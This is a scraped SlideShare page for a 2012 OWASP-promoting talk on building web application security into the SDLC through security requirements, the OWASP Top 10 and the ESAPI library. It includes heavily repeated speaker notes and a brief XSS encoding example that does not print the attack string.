• Save
Application Security Done Right
Upcoming SlideShare
Loading in...5
×
 

Application Security Done Right

on

  • 748 views

Most of the money thrown at securing information systems misses the weak spots. Huge amounts are spent securing infrastructure while web applications are left exposed. It is a crisis that is largely ...

Most of the money thrown at securing information systems misses the weak spots. Huge amounts are spent securing infrastructure while web applications are left exposed. It is a crisis that is largely ignored.

Software development teams, under pressure to deliver features and meet deadlines, often respond to concerns about the security of their web applications by commissioning a last-minute security assessment and then desperately attempt to address only the most glaring findings. They may even simply throw up a web application firewall to mitigate the threats. Such bolted-on solutions are not long-term answers to web application security.

Instead, we advocate a built-in approach. We will show that by weaving security into the software development life cycle, and using mature resources for security coding standards, toolkits and frameworks such as those from OWASP, development teams can consistently produce secure systems without dramatically increasing the development effort or cost.

This slide deck was most recently presented at a SPIN meeting in Cape Town In September 2012 by Paul and Theo from ThinkSmart (www.thinksmart.co.za).

For more information, contact Paul at ThinkSmart (dot see oh dot zed ay).

Statistics

Views

Total Views
748
Views on SlideShare
746
Embed Views
2

Actions

Likes
2
Downloads
0
Comments
0

1 Embed 2

https://twitter.com 2

Accessibility

Categories

Upload Details

Uploaded via as Apple Keynote

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • \n
  • Who are we, where do we come from and why do we think we’re qualified to speak about building secure apps?\n\nBuilt web apps most of our professional lives and still actively maintain an in-house web payment system.\n\nWe perform application security assessments using an “inside-out” approach (design time assessment as opposed to an adversarial penetration test)\n\nWe help development teams design secure business processes and application architectures\n\nWe try to advocate application security where we can\n
  • The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. There are over 70 OWASP Local Chapters world-wide that are free and open to anyone to attend. OWASP tools and documents can be used to detect and to guard against security-related design and implementation flaws, as well as to add security-related activities into YOUR Software Development Life Cycle (SDLC). \nFor more information please visit http://www.owasp.org\n
  • To set the scene we’d like to start by looking at where information security risks lie today.\n\nRisk in the net / inf is largely under control. As our ability to secure our network infrastructure has developed, attackers have turned their attention to web applications because they have become the softer target. At the same time, companies are increasingly moving their business processes to the Web to take advantage of the efficiencies and market reach it provides. This has dramatically increased the opportunity for attack by people seeking to undermine business through fraud, theft, extortion or espionage. A perfect storm of sorts.\n\nAttack tools have become industrialised, allowing the person with intent easy access to the means to commit the crime (was not the case in the recent past).\n\nTell the Dali Lama hack story - “today attackers can buy a root kit and go hunting” (Ross Anderson).\n\nVarious recent studies support this notion...\n
  • Anecdotally, we can support this - we’re a small consultancy and recently we have had three clients who have suffered directly from app sec attacks. In one case it was a small business who lost a CMS (and the data!) in a drive-by SQLi attack.\n\nClearly, thinking you’ll never get attacked is not a good strategy.\n
  • To underpin this, here is an extract from the highly respected Verizon DBIR executive summary.\n\nNote that the report does not say that mitigation efforts need to focus on installing a firewall\n\nThe focus of attention should now be web apps and evolving ways of building them more securely \n
  • \n
  • \n
  • We’ve seen that the focus of attacks on web applications is clearly one driver for application security, but what are the others?\n\nTo use Phil Zimmermann’s very eloquent idiom...: (last year’s ITWeb Summit)\n\nWeb Apps are a fundamental part of our modern day society.\n\nWe need to mature app sec - e.g. even Internet banking is in ICU at the moment, in some ways the attackers have the upper hand.\n\nBe responsible citizens - our clients (users) are demanding it (e.g. phishing victims).\n\nPCI DSS 6.5: “Develop all web applications (internal and external, and including web administrative access to application) based on secure coding guidelines such as the Open Web Application Security Project Guide.”\n
  • “Data security doesn’t stop with network firewalls and anti-virus. \nThe threat landscape has shifted from bringing down networks to stealing data, \nand it’s time to stop fighting yesterday’s war.” (S Kramer, CEO, Imperva) \n\nApril 2010 survey, “The State of Application Security”\n\nBut even though apps are the focus of attacks, NetSec is still the darling. It gets the bulk of the spend.\n\nCompliance requirements tend to lag the trend. e.g. PCI DSS still prioritises net sec over app sec\n\nBudget inertia - Gunnar Peterson says the same\n\nRelate Gary McGraw description of app sec as a network problem (OSI stack, app is just a layer 7 problem, hence app firewalls!)\n\nGMcG: Perhaps the app sec industry could learn from the net sec industry - they must have had the same challenge wresting budget away from the physical sec guys!\n
  • With apologies to Apple, we need to Think Different.\n\nDon’t ignore application security just because it seems to be difficult.\n\nApp sec needs a different approach from NetSec - lego vs clay\n\nThe “hole” allows access to the entire application - its features and its flaws.\n\nIt’s hard enough designing good software; security makes it harder still.\n\nApplication security can not be seen as a net sec problem. WAFs can complement a built-in approach, but not replace it. WAFs are complex chunks of code that have their own vulns.\n\nAsk how many devs in audience...\n
  • So we need to build security in. Devs obviously should be writing more secure code. But why should they?\n\nManagers often take a naive, simplistic view on security, as if it is naturally part of every developer’s skill set like the ability to implement a sorting function. Universities today still don’t teach security to CompSci students.\n\nFor most developers today, caring too much about security is probably a career-limiting move. They need to focus on that latest AJAX / iPhone app / Rails skill to get the big bucks job.\n\nSoftware development teams, under pressure to deliver features and meet deadlines, often respond to concerns about the security of their web applications by commissioning a last-minute security assessment and then desperately attempting to address only the most glaring findings. They may even simply throw up a web application firewall to mitigate the threats. Such bolted-on solutions are not long-term answers to web application security.\n\nSo how do you get your developers to write more secure code?\n
  • ... you could appeal to their conscience ...\n\nEncourage them to subscribe to the Rugged Manifesto, LOL!\n
  • ... or send them on a training course ...\n\nThat’s a better idea, but...\n\nthen they get back to the office and the net effect is that they now have (n - training.course.days) to finish the features.\n
  • Trying to make security a religion or turning selected devs into security ninja’s is only a partial and temporary response to the problem.\n\nRoss Anderson, in his great book “Security Engineering”, makes the point that security is about incentives.\n\nThe only sustainable way is to put security in the spec. I.e. make it part of the requirements of your project and one of the fundamental ways in which the performance of your development teams are measured. Everything flows from there as we will show.\n\nSoftware development teams, under pressure to deliver features and meet deadlines, often respond to concerns about the security of their web applications by commissioning a last-minute security assessment and then desperately attempting to address only the most glaring findings. \n\nThe only way to build security in to to make it part of the requirements.\n\nObviously this has implications, not least of which is on the cost of your project. \n\nWe’ll talk about these as we go along.\n
  • So why this emphasis on spec’cing for security - why not just code it, or test for it?\n\n1. It’s the most efficient place to do it.\n2. The SDLC you use today will be able to cope with it (i.e. no need to change your SDLC to cope).\n
  • Two types of security requirements: \n1. avoid security bugs\n2. avoid security design flaws (software works as intended, but the intention was wrong or unintended features exist that do not break functionality but enable exploits).\n\n(Gary McGraw) - perhaps up to 50% of security vulnerabilities are design flaws, not bugs.\n
  • Don’t fixate on the latest headline-grabbing vulnerabilities.\n\nA famous scene from the Marx Brothers movie, Horse Feathers, features Baravelli guarding the speakeasy, and Wagstaff trying to get in. The password for entry is "Swordfish". This bit was the inspiration for the title of the hacker movie called Swordfish. \n\nImaging the guy on the left is the manager / business analyst and the guy on the right is the developer. Basically the whole “watch the door” process gets left up to “the developer” to design.\n\nYou need a lateral thinker to get security design right - someone who can think like an adversary. Not common.\n
  • Bad or missing requirements get left up to the developers to invent - they’re not always in tune with the big picture...\nApart from the complete failure of the control because the password retry protocol was left up to the dev to design (with "here is the password" as the prompt for the third retry!)\n Some good aspects:\n- There seemed to be a blacklist for easy-to-guess passwords (not "password"!)\n- Swordfish is not a great password but it is at least not in the top 500 bad passwords.\n- They change the password often\n
  • Three drivers of security requirements.\n\nThe ISO should understand the business better than anyone if he is to have any hope in making a contribution to this process.\n\nNB! Let’s read this again!\n
  • Security requirements are just one aspect of a secure SDLC. All phases of an SDLC must be “touched” by security to make a sustainable difference to the security of the code produced by your team.\n\nThis is where a Software Assurance Programme can help - using resources such as OpenSAMM, BSI-MM and Microsoft SDL, orgs have access to great prescriptive guidance as how to go about bootstrapping their SDLCs for App Sec.\n
  • So how do you integrate these activities in your SDLC?\n\nOne step at a time! Your software assurance programme should lead the way.\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Your software assurance programme should do these things.\n
  • Get app sec into the DNA of your company, just like you have already institutionalised NetSec & InfraSec (e.g. anti-virus, firewalls, VPN, laptop encryption etc.).\n\nStarting at the top, ISO27001/2 standard - controls directly address app sec.\n\nA Software Assurance Programme directly addresses these control requirements in your ISMS.\n\nThe SAP weaves a golden thread of security through your SDLC.\n\nAgain, your devs are NB!\n
  • \n
  • \n
  • \n
  • \n
  • In the medium to long term, you need to institutionalise app sec.\n\nYou can start today by opening up your user story template and adding just one line - a link to the OWASP Top-10, i.e. “the security requirement is that we are not vulnerable to this list of security bugs”\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • How do you write software?\nBy using a process called the SDLC\nSome only do coding, deployment\nOthers include design and testing.\nBut without requirements you can’t really do any of the other phases.\nWhat do you design, code, test against? \nOr for that matter deploy and maintain?\nProper, clear requirements are the key to success of any software project\nSo, how do you write secure software?\n
  • You have to apply security to each one of the SDLC phases.\nWhatever software development methodology you use...\n...they all have the same phases\n...maybe not in the same order, or using iterations\nImportant things to realise is that...\n...without security requirements...\n ...you don’t know what security to design into the software ...don’t know how or where to apply secure coding ...or even what security features to test for\n\n
  • You have to apply security to each one of the SDLC phases.\nWhatever software development methodology you use...\n...they all have the same phases\n...maybe not in the same order, or using iterations\nImportant things to realise is that...\n...without security requirements...\n ...you don’t know what security to design into the software ...don’t know how or where to apply secure coding ...or even what security features to test for\n\n
  • If security requirements is all we need...\n...what are we waiting for?\nIf your management is not ready to implements security..\n..you will have to convince them first\nIf you are lucky, you can start right away and implement OpenSAMM\n..and get the ball rolling.\n..implement your Secure SDLC\n..and do the sec requirements dev tasks...\n..with risk assessment probably the most important\nBut, you still have production systems deployed...\n...and even more being produced as we speak.\nSo, what’s the problem?\nThe one thing that you don’t have but the hackers do have is time..\nwhich turns your situation into a timebomb\n\n\n
  • If security requirements is all we need...\n...what are we waiting for?\nIf your management is not ready to implements security..\n..you will have to convince them first\nIf you are lucky, you can start right away and implement OpenSAMM\n..and get the ball rolling.\n..implement your Secure SDLC\n..and do the sec requirements dev tasks...\n..with risk assessment probably the most important\nBut, you still have production systems deployed...\n...and even more being produced as we speak.\nSo, what’s the problem?\nThe one thing that you don’t have but the hackers do have is time..\nwhich turns your situation into a timebomb\n\n\n
  • If security requirements is all we need...\n...what are we waiting for?\nIf your management is not ready to implements security..\n..you will have to convince them first\nIf you are lucky, you can start right away and implement OpenSAMM\n..and get the ball rolling.\n..implement your Secure SDLC\n..and do the sec requirements dev tasks...\n..with risk assessment probably the most important\nBut, you still have production systems deployed...\n...and even more being produced as we speak.\nSo, what’s the problem?\nThe one thing that you don’t have but the hackers do have is time..\nwhich turns your situation into a timebomb\n\n\n
  • Where to now?\nAt this point you need to do fire-fighting using some kind of a.. \n...first-aid or quick-win solution.\nGood news is that all the information and tools are available.\nThe general state of app security is very low.\nWith some effort you can make a huge difference\n
  • OWASP collates information about several security projects including the popular TOP 10 Application Security Risks\n\nTo get going with our plan - download the TOP 10 document\n\n
  • OWASP collates information about several security projects including the popular TOP 10 Application Security Risks\n\nTo get going with our plan - download the TOP 10 document\n\n
  • The TOP 10 Application Security risks is just what is says\nBig Chance that these risks are also your organisations’ TOP 10 risks.\nThe interesting fact to realise is that by adopting these risks..\n..you have made a big step in establishing your security requirements\nStart by implementing these requirements!!\n\n
  • The TOP 10 Application Security risks is just what is says\nBig Chance that these risks are also your organisations’ TOP 10 risks.\nThe interesting fact to realise is that by adopting these risks..\n..you have made a big step in establishing your security requirements\nStart by implementing these requirements!!\n\n
  • The TOP 10 Application Security risks is just what is says\nBig Chance that these risks are also your organisations’ TOP 10 risks.\nThe interesting fact to realise is that by adopting these risks..\n..you have made a big step in establishing your security requirements\nStart by implementing these requirements!!\n\n
  • To read from the document:\nXSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. \nXSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\nThe Cheat Sheet detail page for XSS, like the detail pages for the other risks.. \n..gives a very concise explanation of the vulnerability...\n ...the attack and the defense\n..and lists a whole lot of resources (both internal and external to OWASP)..\n ..that are invaluable in mitigating the risk\nThe Cheat Sheet is the place to start\n
  • To read from the document:\nXSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. \nXSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\nThe Cheat Sheet detail page for XSS, like the detail pages for the other risks.. \n..gives a very concise explanation of the vulnerability...\n ...the attack and the defense\n..and lists a whole lot of resources (both internal and external to OWASP)..\n ..that are invaluable in mitigating the risk\nThe Cheat Sheet is the place to start\n
  • To read from the document:\nXSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. \nXSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\nThe Cheat Sheet detail page for XSS, like the detail pages for the other risks.. \n..gives a very concise explanation of the vulnerability...\n ...the attack and the defense\n..and lists a whole lot of resources (both internal and external to OWASP)..\n ..that are invaluable in mitigating the risk\nThe Cheat Sheet is the place to start\n
  • To read from the document:\nXSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. \nXSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\nThe Cheat Sheet detail page for XSS, like the detail pages for the other risks.. \n..gives a very concise explanation of the vulnerability...\n ...the attack and the defense\n..and lists a whole lot of resources (both internal and external to OWASP)..\n ..that are invaluable in mitigating the risk\nThe Cheat Sheet is the place to start\n
  • To read from the document:\nXSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. \nXSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\nThe Cheat Sheet detail page for XSS, like the detail pages for the other risks.. \n..gives a very concise explanation of the vulnerability...\n ...the attack and the defense\n..and lists a whole lot of resources (both internal and external to OWASP)..\n ..that are invaluable in mitigating the risk\nThe Cheat Sheet is the place to start\n
  • To read from the document:\nXSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. \nXSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\nThe Cheat Sheet detail page for XSS, like the detail pages for the other risks.. \n..gives a very concise explanation of the vulnerability...\n ...the attack and the defense\n..and lists a whole lot of resources (both internal and external to OWASP)..\n ..that are invaluable in mitigating the risk\nThe Cheat Sheet is the place to start\n
  • The Cheat Sheet explains the problem in detail..\n..and stipulates the rules for the various contexts \n ...of the HTML page.. \n ..where attacks can happen\nfor example, a HTML page contains, HTML, JS and CSS values...\n...each context having it’s own allowed characters and string delimiters\n\nLet’s look at attacks on existing JavaScript in your page\n
  • The Cheat Sheet explains the problem in detail..\n..and stipulates the rules for the various contexts \n ...of the HTML page.. \n ..where attacks can happen\nfor example, a HTML page contains, HTML, JS and CSS values...\n...each context having it’s own allowed characters and string delimiters\n\nLet’s look at attacks on existing JavaScript in your page\n
  • The rule for JS is to encode (or escape) before inserting untrusted data into HTML JS data values\nBasically there are 3 places...\n ...inside a quoted string\n ...ons side o a quoted expression\n ...inside a quoted event handler\nYou may wonder where this untrusted data comes from.\nThe HTML page is generated by a web application server.. ..using data originating from all kinds of sources, ..e.g. database, the browser, other apps\n..that you do not have any control over\nLets look at some code\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • This is Java Server Pages source code.\nIt could have been any other tech, like PHP, ASP, whatever.\nThe developer’s intent was to ..get the name of a user from the browser \n..and then to say Hello to him or her. \nThe untrusted data is shown as a comment..\n..and in this example originates from the user or the browser\nIt contains an attack string..\n..that starts with the single quote delimiter character \n..to break out of the JS data value context\nNo encoding takes place\nAnd the generated page contains a XSS injection that\n\n\n
  • To stop such attacks you need to write secure code.\nSecure code utilises security controls\nThe Cheat Sheet gives exact information on..\n..where\n..what\n..and how such a control should work\n\n\n
  • The important thing about choosing a security control is.. \n..that is has to work correctly\n..and that you want to use only a single control for a specific mitigation\nThink before rolling your own..\n..you may waste lots of time\nYour framework could help you\nMicrosoft has plenty of tools\nOWASP’s ESAPI is what I use\n\n\nESAPI is an integrated set of security controls\n
  • I use OWASP’s ESAPI project\nIt’s basically free and can be distributed with my app \nIt works.\nIt is designed to be used with existing frameworks like..\n..Spring, Structs, Tapestry\nExperts keep it up to date\n\nSo, how do you use it\n\n\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • Let’s get some space on the screen and look only at the code..\n\nESAPI comes to the rescue again..\n\n
  • Let’s get some space on the screen and look only at the code..\n\nESAPI comes to the rescue again..\n\n
  • Let’s get some space on the screen and look only at the code..\n\nESAPI comes to the rescue again..\n\n
  • Let’s get some space on the screen and look only at the code..\n\nESAPI comes to the rescue again..\n\n
  • Let’s get some space on the screen and look only at the code..\n\nESAPI comes to the rescue again..\n\n
  • See the ESAPI validator controls\n\nnormal workflow\nreport input failure\nESAPI does:\n...security logging\n...wakes up Intrusion detection\n\n
  • See the ESAPI validator controls\n\nnormal workflow\nreport input failure\nESAPI does:\n...security logging\n...wakes up Intrusion detection\n\n
  • See the ESAPI validator controls\n\nnormal workflow\nreport input failure\nESAPI does:\n...security logging\n...wakes up Intrusion detection\n\n
  • See the ESAPI validator controls\n\nnormal workflow\nreport input failure\nESAPI does:\n...security logging\n...wakes up Intrusion detection\n\n
  • See the ESAPI validator controls\n\nnormal workflow\nreport input failure\nESAPI does:\n...security logging\n...wakes up Intrusion detection\n\n
  • See the ESAPI validator controls\n\nnormal workflow\nreport input failure\nESAPI does:\n...security logging\n...wakes up Intrusion detection\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • We have addressed Risk nr 2 of the TOP 10\nMost of the other Risks can also be addressed using ESAPI\nExcept #6 and #9\nIt’s more related to system configuration\nThere is more than enough information to address that as well\n\n
  • You’ve come a long way but you’re not done yet.\nThere is still plenty to do and understand.\nThe TOP 10 project contains a lot of resources and related projects\n..both internal and external to OWASP\nNotably the dev guide that is still very valid\nThe 2010 is currently being rewritten.\nMany other resources at OWASP - please go have a look at the website.\n\n
  • \n

Application Security Done Right Application Security Done Right Presentation Transcript

  • OWASP Built in, not bolted on: web application security done right Paul van Woudenberg & Theo van Niekerk ThinkSmart
  • ThinkSmart• Paul van Woudenberg & Theo van Niekerk• Web application development background• Strong security focus – clients have demanded it (financial institutions, etc) – we have a passion for security• Today we’re exclusively focussed on helping our clients with application security assurance• We promote OWASP where we can www.thinksmart.co.za
  • OWASP• The Open Web Application Security Project• Worldwide free and open community• Focused on improving the security of application software• Over 70 OWASP Local Chapters world-wide• Tools and documents: – detect and guard against security-related design and implementation flaws – add security-related activities to your SDLC• www.owasp.org View slide
  • Information Security Risk Today• The network / infrastructure security problem is largely solved – mature – standardised – well understood• Business is moving ever increasingly to the Web – efficiencies, market reach – Web 2.0 – SaaS – mobile• Attackers have moved on to exploiting software vulnerabilities in web applications. – they follow the money – attacks tools have become industrialised View slide
